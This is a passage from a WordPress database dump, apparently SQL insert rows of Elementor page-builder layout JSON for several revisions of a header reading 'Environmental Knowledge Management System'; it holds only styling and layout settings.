System\",\"title_color\":\"rgba(0,0,0,0.62)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10170,1753,'_elementor_version','2.7.5'),(10171,1753,'_elementor_template_type','wp-post'),(10175,1754,'_wp_page_template','elementor_canvas'),(10176,1754,'_elementor_edit_mode','builder'),(10177,1754,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Helvetica\",\"text_shadow_text_shadow_type\":\"yes\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10178,1754,'_elementor_version','2.7.5'),(10179,1754,'_elementor_template_type','wp-post'),(10182,1755,'_wp_page_template','elementor_canvas'),(10183,1755,'_elementor_edit_mode','builder'),(10184,1755,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Helvetica\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(97,206,112,0.37)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10185,1755,'_elementor_version','2.7.5'),(10186,1755,'_elementor_template_type','wp-post'),(10189,1756,'_wp_page_template','elementor_canvas'),(10190,1756,'_elementor_edit_mode','builder'),(10191,1756,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Antic Slab\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(97,206,112,0.37)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10192,1756,'_elementor_version','2.7.5'),(10193,1756,'_elementor_template_type','wp-post'),(10196,1757,'_wp_page_template','elementor_canvas'),(10197,1757,'_elementor_edit_mode','builder'),(10198,1757,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Antic Slab\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(97,206,112,0.27)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10199,1757,'_elementor_version','2.7.5'),(10200,1757,'_elementor_template_type','wp-post'),(10203,30,'_edit_last','1'),(10204,1758,'_wp_page_template','elementor_canvas'),(10205,1758,'_elementor_edit_mode','builder'),(10206,1758,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Antic Slab\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(97,206,112,0.27)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":